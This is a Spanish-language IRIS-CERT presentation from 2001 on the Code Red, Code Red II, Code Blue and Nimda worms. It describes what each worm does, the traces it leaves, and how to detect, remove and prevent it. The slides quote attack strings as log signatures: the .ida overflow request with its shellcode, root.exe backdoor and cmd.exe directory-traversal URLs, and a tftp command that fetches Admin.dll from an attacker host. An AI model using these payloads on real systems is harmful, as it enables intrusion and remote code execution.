(Informatica Seguridad Analisis) Reto Informe Tecnico Analisis Forense Rediris
Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001
description
Transcript of Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001
Jornadas Técnicas RedIRIS 2001Pamplona, Octubre 2001
IX Grupo de coordinaciónIRIS-CERTÚltimas tendencias: Gusanos en equipos NT
JT2001 – gusanos en equipos NT- 2IRIS-CERT – [email protected]
Agenda
• Terminología• Gusanos
CODE RED (CRv1, CRv2a, CRv2b)http://www.cert.org/advisories/CA-2001-19.htmlhttp://www.cert.org/advisories/CA-2001-23.html
CODE RED IIhttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.incidents.org/react/code_redII.php
CODE BLUEhttp://xforce.iss.net/alerts/advise96.php
W32/NIMDA // “CONCEPT VIRUS (CV) V 5.”http://www.cert.org/advisories/CA-2001-26.htmlhttp://www.incidents.org/react/nimda.pdf
• Medidas preventivas
JT2001 – gusanos en equipos NT- 3IRIS-CERT – [email protected]
Terminología
• Gusano Programa que puede ejecutarse independientemente y que se puede propagar a otras máquinas. “The Shockware Rider” John Brunner 1975 Morris Worm (“The Internet Worm Incident”) 1988
• Virus Secuencia de código que se inserta en otros programas (“hosts”). Necesita la intervención humana para que se ejecute su programa “hosts”.
JT2001 – gusanos en equipos NT- 4IRIS-CERT – [email protected]
CODE RED.Sistemas afectados
• Windows NT con IIS 4.0/5.0 y Index Server 2.0 instalado
• Windows 2000 con IIS 4.0/5.0 y Index Server instaladohttp://www.microsoft.com/technet/security/bulletin
/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin
/MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-
worm-pub.shtml
JT2001 – gusanos en equipos NT- 5IRIS-CERT – [email protected]
CODE RED.Descripción (CRv1)
• Actividad dependiente de la fecha del sistema: Día 1-19 Actividad de propagación
• Genera direcciones IP aleatorias IIS 4.0/5.0 + IDA infectada Cisco 600 series DSL routers El router deja de
reenviar paquetes No IIS/puerto 80 abierto logea
Se pueden producir re-infecciones Degradación de rendimiento y DoS
• Idioma Inglés (US)? Modificación páginas WWW Día 20-27 DoS contra www.whitehouse.gov Día 28-final mes Duerme infinitamente
JT2001 – gusanos en equipos NT- 6IRIS-CERT – [email protected]
CODE RED.Huellas
• En el sistema/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
• En la red Tráfico desde nuestra máquina (infectada) al puerto
80/tcp de máquinas aleatorias
JT2001 – gusanos en equipos NT- 7IRIS-CERT – [email protected]
CODE RED.Variaciones
• CRv2a No modifica páginas Web Selección de víctimas aleatorias
• CRv2b No modifica páginas Web Selección de victimas mejorado Busca www.whitehouse.gov en DNS
JT2001 – gusanos en equipos NT- 8IRIS-CERT – [email protected]
CODE RED.Detección y Eliminación
• Aumento carga del sistema• Aumento conexiones externas al puerto 80/tcp hacia
direcciones aleatorias (netstat –na)• Code Red FAQ
http://incidents.org/react/code_red.php
• Gusano residente en memoria reiniciar la máquina No nos salva de posteriores re-infecciones El atacante sigue teniendo control total de la máquina
• Aplicar parches recomendados
• CodeRedscannerhttp://www.cymru.com/~robt/Tools/coderedscanner-2.5.tar.
gz• Retina CodeRed Scanner
http://www.eeye.com/html/Research/Tools/RetinaCodeRed.exe
JT2001 – gusanos en equipos NT- 9IRIS-CERT – [email protected]
CODE RED II.Sistemas afectados
• Windows 2000 con IIS 4.0/5.0 y Index Server instalado
• Windows NT 4.0 con IIS 4.0/5.0 y Index Server 2.0 instaladohttp://www.microsoft.com/technet/security/bulletin
/MS01-044.asphttp://www.microsoft.com/technet/security/bulletin
/MS01-033.asp
• Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS)
• Cisco 600 series DSL routershttp://www.cisco.com/warp/public/707/cisco-code-red-
worm-pub.shtml
JT2001 – gusanos en equipos NT- 10IRIS-CERT – [email protected]
CODE RED II.Descripción
• Chequea si el sistema ha sido infectado con anterioridad
• Actividad de propagación: La agresividad del escaneo depende del lenguaje del
sistema Escaneo de direcciones IP de la misma subred de clase A
o B (método probabilístico) Efectos colaterales de saturación
• Copia %SYSTEM%CMD.EXE (puerta trasera) c:\inetpub\scripts\root.exe c:\progra~1\common~1\systema\MSADC\root.exe d:\inetpub\scripts\root.exe d:\progra~1\common~1\systema\MSADC\root.exe
• Instala troyano explorer.exe (c:\ y d:\)
http: // IP/c/inetpub/scripts/root.exe/c+ARBITRARY_COMMAND
JT2001 – gusanos en equipos NT- 11IRIS-CERT – [email protected]
CODE RED II.Huellas
• En el sistemaGET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a
• En la red Tráfico desde nuestra máquina (infectada) al puerto
80/tcp de otras máquinas vecinas
JT2001 – gusanos en equipos NT- 12IRIS-CERT – [email protected]
CODE RED II.Detección y eliminación
• Aumento carga del sistema• Aumento conexiones externas al puerto
80/tcp (netstat –na) (IPs vecinas)
• Code Red FAQ http://incidents.org/react/code_red.php
• AntiCodeRed2.vbshttp://www.incidents.org/react/AntiCodeRed2.vbs
• Microsofthttp://www.microsoft.com/technet/itsolutions/security/
tools/redfix.asp
• Formatear disco duro• Reinstalar software (aplicando parches
recomendados)
JT2001 – gusanos en equipos NT- 13IRIS-CERT – [email protected]
CODE BLUE.Sistemas afectados
• Máquinas con IIS 4.0/5.0 instalado
IIS Extended UNICODE Directory Traversal Vulnerability
http://xforce.iss.net/alerts/advise68.php
GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir
JT2001 – gusanos en equipos NT- 14IRIS-CERT – [email protected]
CODE BLUE.Descripción
• Reside en memoria• Instala un Visual Basic Script (d.vbs) que
elimina el mapeo ISAPI para ficheros “.ida”, “.idq”, “.printer”
• Carga una DDL (httpext.dll) y un .EXE (svchost.exe)
• Propagación escaneo IPs vecinas• 10 am – 11 am GMT Ataque de inundación
contra una IP de China
JT2001 – gusanos en equipos NT- 15IRIS-CERT – [email protected]
CODE BLUE.Eliminación
• Con Regedit encontrar la clave del registroHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run
• Buscar y borrar la entrada del registro para c:\svchost.exe
• Eliminar los archivos c:\svchost.exe y c:\d.vbs• Reiniciar el ordenador • Aplicar parche recomendado
JT2001 – gusanos en equipos NT- 16IRIS-CERT – [email protected]
W32/NIMDA.Sistemas afectados
• Microsoft Windows 95, 98, ME, NT y 2000• Formas de propagarse
De cliente a cliente (vía mail/recursos de red compartidos)
http://www.cert.org/advisories/CA-2001-06.html De servidor Web a cliente (por navegación sobre
páginas modificadas) De cliente a servidor Web
• IIS Extended UNICODE Directory Traversal Vulnerability
http://www.kb.cert.org/vuls/id/111677• Puertas traseras dejadas por Code Red II y sadmin/IIShttp://www.cert.org/incident_notes/IN-2001-09.htmlhttp://www.cert.org/advisories/CA-2001-11.html
JT2001 – gusanos en equipos NT- 17IRIS-CERT – [email protected]
W32/NIMDA.Descripción
• Manda copias de sí mismo a todas las direcciones encontradas en la libreta de direcciones
• Escaneo de IPs aleatorias siguiendo método probabilístico Intenta transferirse a máquinas vulnerables (IIS) vía tftp
(69/udp)• Recorre todos los directorios en el sistema y se copia
como README.EML• Si encuentra archivos .html o .asp incluye código
Javascript que permitirá propagación al navegar por esas páginas
• Crea una cuenta “Guest” (NT y 2000) perteneciente al grupo “Administrator”
• Activa la compartición de la unidad c:\ (C$)• Crea troyanos de aplicaciones legítimas previamente
instaladas en el sistema
JT2001 – gusanos en equipos NT- 18IRIS-CERT – [email protected]
W32/NIMDA.Huellas
GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
JT2001 – gusanos en equipos NT- 19IRIS-CERT – [email protected]
W32/NIMDA.Detección y eliminación
• Buscar root.exe Admin.dll Ficheros .eml y .nws extraños Log:
/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200
x.x.x.x máquina atacante200 comando realizado con éxito
• Formatear disco duro• Reinstalar software (aplicando parches
recomendados)
JT2001 – gusanos en equipos NT- 20IRIS-CERT – [email protected]
Medidas preventivas
• Instalar sólo los servicios estrictamente necesarios• Permitir acceso sólo a los servidores públicos• Mantener las máquinas actualizadas con los últimos parches
de seguridad Hotfix (Microsoft)http://support.microsoft.com/support/kb/articles/q303/2/15.asp?
id=303215&sd=tech
• Desactivar extensiones dañinas en IIS Lockdown (Microsoft)http://www.microsoft.com/technet/security/tools/locktool.asp
• Bloquear el tráfico HTTP en función de la URL que se solicita (Cisco nbar+acl)http://www.cisco.com/warp/public/63/nimda.shtmlhttp://www.cisco.com/warp/public/63/nbar_acl_codered.shtml
• Cambiar el directorio base de la instalación de Windows NT• Chequear/controlar los logs de los servidores Web• Contestar/actuar rápidamente ante denuncias.
JT2001 – gusanos en equipos NT- 21IRIS-CERT – [email protected]